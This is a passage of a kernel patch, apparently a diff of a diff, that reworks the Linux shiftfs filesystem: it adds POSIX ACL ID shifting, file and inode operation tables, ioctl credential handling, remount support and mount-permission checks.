+-	.mknod		= NULL,	/* no special files currently */
+-	.listxattr	= shiftfs_listxattr,
+-};
++#ifdef CONFIG_SHIFT_FS_POSIX_ACL
+ 
+-static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
+-				       struct dentry *dentry)
++static int
++shift_acl_ids(struct user_namespace *from, struct user_namespace *to,
++	      struct posix_acl *acl)
+ {
+-	struct inode *inode;
+-
+-	inode = new_inode(sb);
+-	if (!inode)
+-		return NULL;
+-
+-	/*
+-	 * our inode is completely vestigial.  All lookups, getattr
+-	 * and permission checks are done on the underlying inode, so
+-	 * what the user sees is entirely from the underlying inode.
+-	 */
+-	mode &= S_IFMT;
++	int i;
++
++	for (i = 0; i < acl->a_count; i++) {
++		struct posix_acl_entry *e = &acl->a_entries[i];
++		switch(e->e_tag) {
++		case ACL_USER:
++			e->e_uid = shift_kuid(from, to, e->e_uid);
++			if (!uid_valid(e->e_uid))
++				return -EOVERFLOW;
++			break;
++		case ACL_GROUP:
++			e->e_gid = shift_kgid(from, to, e->e_gid);
++			if (!gid_valid(e->e_gid))
++				return -EOVERFLOW;
++			break;
++		}
++	}
++	return 0;
++}
+ 
+-	inode->i_ino = get_next_ino();
+-	inode->i_mode = mode;
+-	inode->i_flags |= S_NOATIME | S_NOCMTIME;
++static void
++shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to,
++		    void *value, size_t size)
++{
++	struct posix_acl_xattr_header *header = value;
++	struct posix_acl_xattr_entry *entry = (void *)(header + 1), *end;
++	int count;
++	kuid_t kuid;
++	kgid_t kgid;
+ 
+-	inode->i_op = &shiftfs_inode_ops;
++	if (!value)
++		return;
++	if (size < sizeof(struct posix_acl_xattr_header))
++		return;
++	if (header->a_version != cpu_to_le32(POSIX_ACL_XATTR_VERSION))
++		return;
+ 
+-	shiftfs_fill_inode(inode, dentry);
++	count = posix_acl_xattr_count(size);
++	if (count < 0)
++		return;
++	if (count == 0)
++		return;
+ 
+-	return inode;
++	for (end = entry + count; entry != end; entry++) {
++		switch(le16_to_cpu(entry->e_tag)) {
++		case ACL_USER:
++			kuid = make_kuid(&init_user_ns, le32_to_cpu(entry->e_id));
++			kuid = shift_kuid(from, to, kuid);
++			entry->e_id = cpu_to_le32(from_kuid(&init_user_ns, kuid));
++			break;
++		case ACL_GROUP:
++			kgid = make_kgid(&init_user_ns, le32_to_cpu(entry->e_id));
++			kgid = shift_kgid(from, to, kgid);
++			entry->e_id = cpu_to_le32(from_kgid(&init_user_ns, kgid));
++			break;
++		default:
++			break;
++		}
++	}
+ }
+ 
+-static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry)
++static struct posix_acl *shiftfs_get_acl(struct inode *inode, int type)
+ {
+-	struct super_block *sb = dentry->d_sb;
+-	struct shiftfs_super_info *ssi = sb->s_fs_info;
++	struct inode *loweri = inode->i_private;
++	const struct cred *oldcred;
++	struct posix_acl *lower_acl, *acl = NULL;
++	struct user_namespace *from_ns = loweri->i_sb->s_user_ns;
++	struct user_namespace *to_ns = inode->i_sb->s_user_ns;
++	int size;
++	int err;
+ 
+-	if (ssi->mark)
+-		seq_show_option(m, "mark", NULL);
++	if (!IS_POSIXACL(loweri))
++		return NULL;
+ 
+-	return 0;
+-}
++	oldcred = shiftfs_override_creds(inode->i_sb);
++	lower_acl = get_acl(loweri, type);
++	revert_creds(oldcred);
+ 
+-static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf)
+-{
+-	struct super_block *sb = dentry->d_sb;
+-	struct shiftfs_super_info *ssi = sb->s_fs_info;
+-	struct dentry *root = sb->s_root;
+-	struct dentry *realroot = root->d_fsdata;
+-	struct path realpath = { .mnt = ssi->mnt, .dentry = realroot };
+-	int err;
++	if (lower_acl && !IS_ERR(lower_acl)) {
++		/* XXX: export posix_acl_clone? */
++		size = sizeof(struct posix_acl) +
++		       lower_acl->a_count * sizeof(struct posix_acl_entry);
++		acl = kmemdup(lower_acl, size, GFP_KERNEL);
++		posix_acl_release(lower_acl);
+ 
+-	err = vfs_statfs(&realpath, buf);
+-	if (err)
+-		return err;
++		if (!acl)
++			return ERR_PTR(-ENOMEM);
+ 
+-	buf->f_type = sb->s_magic;
++		refcount_set(&acl->a_refcount, 1);
+ 
+-	return 0;
++		err = shift_acl_ids(from_ns, to_ns, acl);
++		if (err) {
++			kfree(acl);
++			return ERR_PTR(err);
++		}
++	}
++
++	return acl;
+ }
+ 
+-static void shiftfs_put_super(struct super_block *sb)
++static int
++shiftfs_posix_acl_xattr_get(const struct xattr_handler *handler,
++			   struct dentry *dentry, struct inode *inode,
++			   const char *name, void *buffer, size_t size)
+ {
+-	struct shiftfs_super_info *ssi = sb->s_fs_info;
++	struct inode *loweri = inode->i_private;
++	int ret;
++
++	ret = shiftfs_xattr_get(NULL, dentry, inode, handler->name,
++				buffer, size);
++	if (ret < 0)
++		return ret;
+ 
+-	mntput(ssi->mnt);
+-	put_user_ns(ssi->userns);
+-	kfree(ssi);
++	inode_lock(loweri);
++	shift_acl_xattr_ids(loweri->i_sb->s_user_ns, inode->i_sb->s_user_ns,
++			    buffer, size);
++	inode_unlock(loweri);
++	return ret;
+ }
+ 
+-static const struct xattr_handler shiftfs_xattr_handler = {
+-	.prefix = "",
+-	.get    = shiftfs_xattr_get,
+-	.set    = shiftfs_xattr_set,
+-};
++static int
++shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
++			    struct dentry *dentry, struct inode *inode,
++			    const char *name, const void *value,
++			    size_t size, int flags)
++{
++	struct inode *loweri = inode->i_private;
++	int err;
+ 
+-const struct xattr_handler *shiftfs_xattr_handlers[] = {
+-	&shiftfs_xattr_handler,
+-	NULL
+-};
++	if (!IS_POSIXACL(loweri) || !loweri->i_op->set_acl)
++		return -EOPNOTSUPP;
++	if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode))
++		return value ? -EACCES : 0;
++	if (!inode_owner_or_capable(inode))
++		return -EPERM;
++
++	if (value) {
++		shift_acl_xattr_ids(inode->i_sb->s_user_ns,
++				    loweri->i_sb->s_user_ns,
++				    (void *)value, size);
++		err = shiftfs_setxattr(dentry, inode, handler->name, value,
++				       size, flags);
++	} else {
++		err = shiftfs_removexattr(dentry, handler->name);
++	}
+ 
+-static const struct super_operations shiftfs_super_ops = {
+-	.put_super	= shiftfs_put_super,
+-	.show_options	= shiftfs_show_options,
+-	.statfs		= shiftfs_statfs,
++	if (!err)
++		shiftfs_copyattr(loweri, inode);
++
++	return err;
++}
++
++static const struct xattr_handler
++shiftfs_posix_acl_access_xattr_handler = {
++	.name = XATTR_NAME_POSIX_ACL_ACCESS,
++	.flags = ACL_TYPE_ACCESS,
++	.get = shiftfs_posix_acl_xattr_get,
++	.set = shiftfs_posix_acl_xattr_set,
+ };
+ 
+-struct shiftfs_data {
+-	void *data;
+-	const char *path;
++static const struct xattr_handler
++shiftfs_posix_acl_default_xattr_handler = {
++	.name = XATTR_NAME_POSIX_ACL_DEFAULT,
++	.flags = ACL_TYPE_DEFAULT,
++	.get = shiftfs_posix_acl_xattr_get,
++	.set = shiftfs_posix_acl_xattr_set,
+ };
+ 
+-static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+-			      int silent)
+-{
+-	struct shiftfs_data *data = raw_data;
+-	char *name = kstrdup(data->path, GFP_KERNEL);
+-	int err = -ENOMEM;
+-	struct shiftfs_super_info *ssi = NULL;
+-	struct path path;
+-	struct dentry *dentry;
++#else /* !CONFIG_SHIFT_FS_POSIX_ACL */
+ 
+-	if (!name)
+-		goto out;
++#define shiftfs_get_acl NULL
+ 
+-	ssi = kzalloc(sizeof(*ssi), GFP_KERNEL);
+-	if (!ssi)
+-		goto out;
++#endif /* CONFIG_SHIFT_FS_POSIX_ACL */
+ 
+-	err = -EPERM;
+-	err = shiftfs_parse_options(ssi, data->data);
++static const struct inode_operations shiftfs_dir_inode_operations = {
++	.lookup		= shiftfs_lookup,
++	.mkdir		= shiftfs_mkdir,
++	.symlink	= shiftfs_symlink,
++	.unlink		= shiftfs_unlink,
++	.rmdir		= shiftfs_rmdir,
++	.rename		= shiftfs_rename,
++	.link		= shiftfs_link,
++	.setattr	= shiftfs_setattr,
++	.create		= shiftfs_create,
++	.mknod		= shiftfs_mknod,
++	.permission	= shiftfs_permission,
++	.getattr	= shiftfs_getattr,
++	.listxattr	= shiftfs_listxattr,
++	.get_acl	= shiftfs_get_acl,
++};
++
++static const struct inode_operations shiftfs_file_inode_operations = {
++	.fiemap		= shiftfs_fiemap,
++	.getattr	= shiftfs_getattr,
++	.get_acl	= shiftfs_get_acl,
++	.listxattr	= shiftfs_listxattr,
++	.permission	= shiftfs_permission,
++	.setattr	= shiftfs_setattr,
++	.tmpfile	= shiftfs_tmpfile,
++};
++
++static const struct inode_operations shiftfs_special_inode_operations = {
++	.getattr	= shiftfs_getattr,
++	.get_acl	= shiftfs_get_acl,
++	.listxattr	= shiftfs_listxattr,
++	.permission	= shiftfs_permission,
++	.setattr	= shiftfs_setattr,
++};
++
++static const struct inode_operations shiftfs_symlink_inode_operations = {
++	.getattr	= shiftfs_getattr,
++	.get_link	= shiftfs_get_link,
++	.listxattr	= shiftfs_listxattr,
++	.setattr	= shiftfs_setattr,
++};
++
++static struct file *shiftfs_open_realfile(const struct file *file,
++					  struct path *realpath)
++{
++	struct file *lowerf;
++	const struct cred *oldcred;
++	struct inode *inode = file_inode(file);
++	struct inode *loweri = realpath->dentry->d_inode;
++	struct shiftfs_super_info *info = inode->i_sb->s_fs_info;
++
++	oldcred = shiftfs_override_creds(inode->i_sb);
++	/* XXX: open_with_fake_path() not guaranteed to stay around; if
++	 * removed, use dentry_open() */
++	lowerf = open_with_fake_path(realpath, file->f_flags, loweri, info->creator_cred);
++	revert_creds(oldcred);
++
++	return lowerf;
++}
++
++#define SHIFTFS_SETFL_MASK (O_APPEND | O_NONBLOCK | O_NDELAY | O_DIRECT)
++
++static int shiftfs_change_flags(struct file *file, unsigned int flags)
++{
++	struct inode *inode = file_inode(file);
++	int err;
++
++	/* if some flag changed that cannot be changed then something's amiss */
++	if (WARN_ON((file->f_flags ^ flags) & ~SHIFTFS_SETFL_MASK))
++		return -EIO;
++
++	flags &= SHIFTFS_SETFL_MASK;
++
++	if (((flags ^ file->f_flags) & O_APPEND) && IS_APPEND(inode))
++		return -EPERM;
++
++	if (flags & O_DIRECT) {
++		if (!file->f_mapping->a_ops ||
++		    !file->f_mapping->a_ops->direct_IO)
++			return -EINVAL;
++	}
++
++	if (file->f_op->check_flags) {
++		err = file->f_op->check_flags(flags);
++		if (err)
++			return err;
++	}
++
++	spin_lock(&file->f_lock);
++	file->f_flags = (file->f_flags & ~SHIFTFS_SETFL_MASK) | flags;
++	spin_unlock(&file->f_lock);
++
++	return 0;
++}
++
++static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
++{
++	struct shiftfs_file_info *file_info = file->private_data;
++	struct file *realfile = file_info->realfile;
++
++	lowerfd->flags = 0;
++	lowerfd->file = realfile;
++
++	/* Did the flags change since open? */
++	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
++		return shiftfs_change_flags(lowerfd->file, file->f_flags);
++
++	return 0;
++}
++
++static int shiftfs_open(struct inode *inode, struct file *file)
++{
++	struct shiftfs_super_info *ssi = inode->i_sb->s_fs_info;
++	struct shiftfs_file_info *file_info;
++	struct file *realfile;
++	struct path *realpath;
++
++	file_info = kmem_cache_zalloc(shiftfs_file_info_cache, GFP_KERNEL);
++	if (!file_info)
++		return -ENOMEM;
++
++	realpath = &file_info->realpath;
++	realpath->mnt = ssi->mnt;
++	realpath->dentry = file->f_path.dentry->d_fsdata;
++
++	realfile = shiftfs_open_realfile(file, realpath);
++	if (IS_ERR(realfile)) {
++		kmem_cache_free(shiftfs_file_info_cache, file_info);
++		return PTR_ERR(realfile);
++	}
++
++	file->private_data = file_info;
++	file_info->realfile = realfile;
++	return 0;
++}
++
++static int shiftfs_release(struct inode *inode, struct file *file)
++{
++	struct shiftfs_file_info *file_info = file->private_data;
++
++	if (file_info) {
++		if (file_info->realfile)
++			fput(file_info->realfile);
++
++		kmem_cache_free(shiftfs_file_info_cache, file_info);
++	}
++
++	return 0;
++}
++
++static loff_t shiftfs_llseek(struct file *file, loff_t offset, int whence)
++{
++	struct inode *realinode = file_inode(file)->i_private;
++
++	return generic_file_llseek_size(file, offset, whence,
++					realinode->i_sb->s_maxbytes,
++					i_size_read(realinode));
++}
++
++/* XXX: Need to figure out what to do about atime updates, maybe other
++ * timestamps too ... ref. ovl_file_accessed() */
++
++static rwf_t shiftfs_iocb_to_rwf(struct kiocb *iocb)
++{
++	int ifl = iocb->ki_flags;
++	rwf_t flags = 0;
++
++	if (ifl & IOCB_NOWAIT)
++		flags |= RWF_NOWAIT;
++	if (ifl & IOCB_HIPRI)
++		flags |= RWF_HIPRI;
++	if (ifl & IOCB_DSYNC)
++		flags |= RWF_DSYNC;
++	if (ifl & IOCB_SYNC)
++		flags |= RWF_SYNC;
++
++	return flags;
++}
++
++static ssize_t shiftfs_read_iter(struct kiocb *iocb, struct iov_iter *iter)
++{
++	struct file *file = iocb->ki_filp;
++	struct fd lowerfd;
++	const struct cred *oldcred;
++	ssize_t ret;
++
++	if (!iov_iter_count(iter))
++		return 0;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		return ret;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	ret = vfs_iter_read(lowerfd.file, iter, &iocb->ki_pos,
++			    shiftfs_iocb_to_rwf(iocb));
++	revert_creds(oldcred);
++
++	shiftfs_file_accessed(file);
++
++	fdput(lowerfd);
++	return ret;
++}
++
++static ssize_t shiftfs_write_iter(struct kiocb *iocb, struct iov_iter *iter)
++{
++	struct file *file = iocb->ki_filp;
++	struct inode *inode = file_inode(file);
++	struct fd lowerfd;
++	const struct cred *oldcred;
++	ssize_t ret;
++
++	if (!iov_iter_count(iter))
++		return 0;
++
++	inode_lock(inode);
++	/* Update mode */
++	shiftfs_copyattr(inode->i_private, inode);
++	ret = file_remove_privs(file);
++	if (ret)
++		goto out_unlock;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		goto out_unlock;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	file_start_write(lowerfd.file);
++	ret = vfs_iter_write(lowerfd.file, iter, &iocb->ki_pos,
++			     shiftfs_iocb_to_rwf(iocb));
++	file_end_write(lowerfd.file);
++	revert_creds(oldcred);
++
++	/* Update size */
++	shiftfs_copyattr(inode->i_private, inode);
++
++	fdput(lowerfd);
++
++out_unlock:
++	inode_unlock(inode);
++	return ret;
++}
++
++static int shiftfs_fsync(struct file *file, loff_t start, loff_t end,
++			 int datasync)
++{
++	struct fd lowerfd;
++	const struct cred *oldcred;
++	int ret;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		return ret;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	ret = vfs_fsync_range(lowerfd.file, start, end, datasync);
++	revert_creds(oldcred);
++
++	fdput(lowerfd);
++	return ret;
++}
++
++static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma)
++{
++	struct shiftfs_file_info *file_info = file->private_data;
++	struct file *realfile = file_info->realfile;
++	const struct cred *oldcred;
++	int ret;
++
++	if (!realfile->f_op->mmap)
++		return -ENODEV;
++
++	if (WARN_ON(file != vma->vm_file))
++		return -EIO;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	vma->vm_file = get_file(realfile);
++	ret = call_mmap(vma->vm_file, vma);
++	revert_creds(oldcred);
++
++	shiftfs_file_accessed(file);
++
++	if (ret)
++		fput(realfile); /* Drop refcount from new vm_file value */
++	else
++		fput(file); /* Drop refcount from previous vm_file value */
++
++	return ret;
++}
++
++static long shiftfs_fallocate(struct file *file, int mode, loff_t offset,
++			      loff_t len)
++{
++	struct inode *inode = file_inode(file);
++	struct inode *loweri = inode->i_private;
++	struct fd lowerfd;
++	const struct cred *oldcred;
++	int ret;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		return ret;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	ret = vfs_fallocate(lowerfd.file, mode, offset, len);
++	revert_creds(oldcred);
++
++	/* Update size */
++	shiftfs_copyattr(loweri, inode);
++
++	fdput(lowerfd);
++	return ret;
++}
++
++static int shiftfs_fadvise(struct file *file, loff_t offset, loff_t len,
++			   int advice)
++{
++	struct fd lowerfd;
++	const struct cred *oldcred;
++	int ret;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		return ret;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	ret = vfs_fadvise(lowerfd.file, offset, len, advice);
++	revert_creds(oldcred);
++
++	fdput(lowerfd);
++	return ret;
++}
++
++static int shiftfs_override_ioctl_creds(const struct super_block *sb,
++					const struct cred **oldcred,
++					struct cred **newcred)
++{
++	kuid_t fsuid = current_fsuid();
++	kgid_t fsgid = current_fsgid();
++
++	*oldcred = shiftfs_override_creds(sb);
++
++	*newcred = prepare_creds();
++	if (!*newcred) {
++		revert_creds(*oldcred);
++		return -ENOMEM;
++	}
++
++	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
++	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
++
++	/* clear all caps to prevent bypassing capable() checks */
++	cap_clear((*newcred)->cap_bset);
++	cap_clear((*newcred)->cap_effective);
++	cap_clear((*newcred)->cap_inheritable);
++	cap_clear((*newcred)->cap_permitted);
++
++	put_cred(override_creds(*newcred));
++	return 0;
++}
++
++static inline void shiftfs_revert_ioctl_creds(const struct cred *oldcred,
++					      struct cred *newcred)
++{
++	return shiftfs_revert_object_creds(oldcred, newcred);
++}
++
++static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
++			       unsigned long arg)
++{
++	long ret = 0;
++	struct fd lowerfd;
++	struct cred *newcred;
++	const struct cred *oldcred;
++	struct super_block *sb = file->f_path.dentry->d_sb;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		return ret;
++
++	ret = shiftfs_override_ioctl_creds(sb, &oldcred, &newcred);
++	if (ret)
++		goto out_fdput;
++
++	ret = vfs_ioctl(lowerfd.file, cmd, arg);
++
++	shiftfs_revert_ioctl_creds(oldcred, newcred);
++
++	shiftfs_copyattr(file_inode(lowerfd.file), file_inode(file));
++	shiftfs_copyflags(file_inode(lowerfd.file), file_inode(file));
++
++out_fdput:
++	fdput(lowerfd);
++
++	return ret;
++}
++
++static long shiftfs_ioctl(struct file *file, unsigned int cmd,
++			  unsigned long arg)
++{
++	switch (cmd) {
++	case FS_IOC_GETVERSION:
++		/* fall through */
++	case FS_IOC_GETFLAGS:
++		/* fall through */
++	case FS_IOC_SETFLAGS:
++		break;
++	default:
++		return -ENOTTY;
++	}
++
++	return shiftfs_real_ioctl(file, cmd, arg);
++}
++
++static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd,
++				 unsigned long arg)
++{
++	switch (cmd) {
++	case FS_IOC32_GETVERSION:
++		/* fall through */
++	case FS_IOC32_GETFLAGS:
++		/* fall through */
++	case FS_IOC32_SETFLAGS:
++		break;
++	default:
++		return -ENOIOCTLCMD;
++	}
++
++	return shiftfs_real_ioctl(file, cmd, arg);
++}
++
++enum shiftfs_copyop {
++	SHIFTFS_COPY,
++	SHIFTFS_CLONE,
++	SHIFTFS_DEDUPE,
++};
++
++static ssize_t shiftfs_copyfile(struct file *file_in, loff_t pos_in,
++				struct file *file_out, loff_t pos_out, u64 len,
++				unsigned int flags, enum shiftfs_copyop op)
++{
++	ssize_t ret;
++	struct fd real_in, real_out;
++	const struct cred *oldcred;
++	struct inode *inode_out = file_inode(file_out);
++	struct inode *loweri = inode_out->i_private;
++
++	ret = shiftfs_real_fdget(file_out, &real_out);
++	if (ret)
++		return ret;
++
++	ret = shiftfs_real_fdget(file_in, &real_in);
++	if (ret) {
++		fdput(real_out);
++		return ret;
++	}
++
++	oldcred = shiftfs_override_creds(inode_out->i_sb);
++	switch (op) {
++	case SHIFTFS_COPY:
++		ret = vfs_copy_file_range(real_in.file, pos_in, real_out.file,
++					  pos_out, len, flags);
++		break;
++
++	case SHIFTFS_CLONE:
++		ret = vfs_clone_file_range(real_in.file, pos_in, real_out.file,
++					   pos_out, len, flags);
++		break;
++
++	case SHIFTFS_DEDUPE:
++		ret = vfs_dedupe_file_range_one(real_in.file, pos_in,
++						real_out.file, pos_out, len,
++						flags);
++		break;
++	}
++	revert_creds(oldcred);
++
++	/* Update size */
++	shiftfs_copyattr(loweri, inode_out);
++
++	fdput(real_in);
++	fdput(real_out);
++
++	return ret;
++}
++
++static ssize_t shiftfs_copy_file_range(struct file *file_in, loff_t pos_in,
++				       struct file *file_out, loff_t pos_out,
++				       size_t len, unsigned int flags)
++{
++	return shiftfs_copyfile(file_in, pos_in, file_out, pos_out, len, flags,
++				SHIFTFS_COPY);
++}
++
++static loff_t shiftfs_remap_file_range(struct file *file_in, loff_t pos_in,
++				       struct file *file_out, loff_t pos_out,
++				       loff_t len, unsigned int remap_flags)
++{
++	enum shiftfs_copyop op;
++
++	if (remap_flags & ~(REMAP_FILE_DEDUP | REMAP_FILE_ADVISORY))
++		return -EINVAL;
++
++	if (remap_flags & REMAP_FILE_DEDUP)
++		op = SHIFTFS_DEDUPE;
++	else
++		op = SHIFTFS_CLONE;
++
++	return shiftfs_copyfile(file_in, pos_in, file_out, pos_out, len,
++				remap_flags, op);
++}
++
++static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx)
++{
++	const struct cred *oldcred;
++	int err = -ENOTDIR;
++	struct shiftfs_file_info *file_info = file->private_data;
++	struct file *realfile = file_info->realfile;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	err = iterate_dir(realfile, ctx);
++	revert_creds(oldcred);
++
++	return err;
++}
++
++const struct file_operations shiftfs_file_operations = {
++	.open			= shiftfs_open,
++	.release		= shiftfs_release,
++	.llseek			= shiftfs_llseek,
++	.read_iter		= shiftfs_read_iter,
++	.write_iter		= shiftfs_write_iter,
++	.fsync			= shiftfs_fsync,
++	.mmap			= shiftfs_mmap,
++	.fallocate		= shiftfs_fallocate,
++	.fadvise		= shiftfs_fadvise,
++	.unlocked_ioctl		= shiftfs_ioctl,
++	.compat_ioctl		= shiftfs_compat_ioctl,
++	.copy_file_range	= shiftfs_copy_file_range,
++	.remap_file_range	= shiftfs_remap_file_range,
++};
++
++const struct file_operations shiftfs_dir_operations = {
++	.compat_ioctl		= shiftfs_compat_ioctl,
++	.fsync			= shiftfs_fsync,
++	.iterate_shared		= shiftfs_iterate_shared,
++	.llseek			= shiftfs_llseek,
++	.open			= shiftfs_open,
++	.read			= generic_read_dir,
++	.release		= shiftfs_release,
++	.unlocked_ioctl		= shiftfs_ioctl,
++};
++
++static const struct address_space_operations shiftfs_aops = {
++	/* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO */
++	.direct_IO	= noop_direct_IO,
++};
++
++static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
++			       umode_t mode, dev_t dev, struct dentry *dentry)
++{
++	struct inode *loweri;
++
++	inode->i_ino = ino;
++	inode->i_flags |= S_NOCMTIME;
++
++	mode &= S_IFMT;
++	inode->i_mode = mode;
++	switch (mode & S_IFMT) {
++	case S_IFDIR:
++		inode->i_op = &shiftfs_dir_inode_operations;
++		inode->i_fop = &shiftfs_dir_operations;
++		break;
++	case S_IFLNK:
++		inode->i_op = &shiftfs_symlink_inode_operations;
++		break;
++	case S_IFREG:
++		inode->i_op = &shiftfs_file_inode_operations;
++		inode->i_fop = &shiftfs_file_operations;
++		inode->i_mapping->a_ops = &shiftfs_aops;
++		break;
++	default:
++		inode->i_op = &shiftfs_special_inode_operations;
++		init_special_inode(inode, mode, dev);
++		break;
++	}
++
++	if (!dentry)
++		return;
++
++	loweri = dentry->d_inode;
++	if (!loweri->i_op->get_link)
++		inode->i_opflags |= IOP_NOFOLLOW;
++
++	shiftfs_copyattr(loweri, inode);
++	shiftfs_copyflags(loweri, inode);
++	set_nlink(inode, loweri->i_nlink);
++}
++
++static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry)
++{
++	struct super_block *sb = dentry->d_sb;
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
++
++	if (sbinfo->mark)
++		seq_show_option(m, "mark", NULL);
++
++	if (sbinfo->passthrough)
++		seq_printf(m, ",passthrough=%u", sbinfo->passthrough);
++
++	return 0;
++}
++
++static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf)
++{
++	struct super_block *sb = dentry->d_sb;
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
++	struct dentry *root = sb->s_root;
++	struct dentry *realroot = root->d_fsdata;
++	struct path realpath = { .mnt = sbinfo->mnt, .dentry = realroot };
++	int err;
++
++	err = vfs_statfs(&realpath, buf);
+ 	if (err)
+-		goto out;
++		return err;
+ 
+-	/* to mark a mount point, must be real root */
+-	if (ssi->mark && !capable(CAP_SYS_ADMIN))
+-		goto out;
++	if (!shiftfs_passthrough_statfs(sbinfo))
++		buf->f_type = sb->s_magic;
+ 
+-	/* else to mount a mark, must be userns admin */
+-	if (!ssi->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN))
+-		goto out;
++	return 0;
++}
+ 
+-	err = kern_path(name, LOOKUP_FOLLOW, &path);
++static void shiftfs_evict_inode(struct inode *inode)
++{
++	struct inode *loweri = inode->i_private;
++
++	clear_inode(inode);
++
++	if (loweri)
++		iput(loweri);
++}
++
++static void shiftfs_put_super(struct super_block *sb)
++{
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
++
++	if (sbinfo) {
++		mntput(sbinfo->mnt);
++		put_cred(sbinfo->creator_cred);
++		kfree(sbinfo);
++	}
++}
++
++static const struct xattr_handler shiftfs_xattr_handler = {
++	.prefix = "",
++	.get    = shiftfs_xattr_get,
++	.set    = shiftfs_xattr_set,
++};
++
++const struct xattr_handler *shiftfs_xattr_handlers[] = {
++#ifdef CONFIG_SHIFT_FS_POSIX_ACL
++	&shiftfs_posix_acl_access_xattr_handler,
++	&shiftfs_posix_acl_default_xattr_handler,
++#endif
++	&shiftfs_xattr_handler,
++	NULL
++};
++
++static inline bool passthrough_is_subset(int old_flags, int new_flags)
++{
++	if ((new_flags & old_flags) != new_flags)
++		return false;
++
++	return true;
++}
++
++static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
++{
++	int err;
++	struct shiftfs_super_info new = {};
++	struct shiftfs_super_info *info = sb->s_fs_info;
++
++	err = shiftfs_parse_mount_options(&new, data);
+ 	if (err)
+-		goto out;
++		return err;
++
++	/* Mark mount option cannot be changed. */
++	if (info->mark || (info->mark != new.mark))
++		return -EPERM;
++
++	if (info->passthrough != new.passthrough) {
++		/* Don't allow exceeding passthrough options of mark mount. */
++		if (!passthrough_is_subset(info->info_mark->passthrough,
++					   info->passthrough))
++			return -EPERM;
++
++		info->passthrough = new.passthrough;
++	}
++
++	return 0;
++}
+ 
+-	err = -EPERM;
++static const struct super_operations shiftfs_super_ops = {
++	.put_super	= shiftfs_put_super,
++	.show_options	= shiftfs_show_options,
++	.statfs		= shiftfs_statfs,
++	.remount_fs	= shiftfs_remount,
++	.evict_inode	= shiftfs_evict_inode,
++};
++
++struct shiftfs_data {
++	void *data;
++	const char *path;
++};
++
++static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
++			      int silent)
++{
++	int err;
++	struct path path = {};
++	struct shiftfs_super_info *sbinfo_mp;
++	char *name = NULL;
++	struct inode *inode = NULL;
++	struct dentry *dentry = NULL;
++	struct shiftfs_data *data = raw_data;
++	struct shiftfs_super_info *sbinfo = NULL;
++
++	if (!data->path)
++		return -EINVAL;
++
++	sb->s_fs_info = kzalloc(sizeof(*sbinfo), GFP_KERNEL);
++	if (!sb->s_fs_info)
++		return -ENOMEM;
++	sbinfo = sb->s_fs_info;
++
++	err = shiftfs_parse_mount_options(sbinfo, data->data);
++	if (err)
++		return err;
++
++	/* to mount a mark, must be userns admin */
++	if (!sbinfo->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN))
++		return -EPERM;
++
++	name = kstrdup(data->path, GFP_KERNEL);
++	if (!name)
++		return -ENOMEM;
++
++	err = kern_path(name, LOOKUP_FOLLOW, &path);
++	if (err)
++		goto out_free_name;
+ 
+ 	if (!S_ISDIR(path.dentry->d_inode->i_mode)) {
+ 		err = -ENOTDIR;
+-		goto out_put;
++		goto out_put_path;
+ 	}
+ 
+-	sb->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;
+-	if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
+-		printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n");
+-		err = -EINVAL;
+-		goto out_put;
+-	}
++	if (sbinfo->mark) {
++		struct super_block *lower_sb = path.mnt->mnt_sb;
++
++		/* to mark a mount point, must be root wrt lower s_user_ns */
++		if (!ns_capable(lower_sb->s_user_ns, CAP_SYS_ADMIN)) {
++			err = -EPERM;
++			goto out_put_path;
++		}
+ 
+-	if (ssi->mark) {
+ 		/*
+ 		 * this part is visible unshifted, so make sure no
+ 		 * executables that could be used to give suid
+ 		 * privileges
+ 		 */
+ 		sb->s_iflags = SB_I_NOEXEC;
+-		ssi->mnt = path.mnt;
+-		dentry = path.dentry;
+-	} else {
+-		struct shiftfs_super_info *mp_ssi;
+ 
+ 		/*
+-		 * this leg executes if we're admin capable in
+-		 * the namespace, so be very careful
++		 * Handle nesting of shiftfs mounts by referring this mark
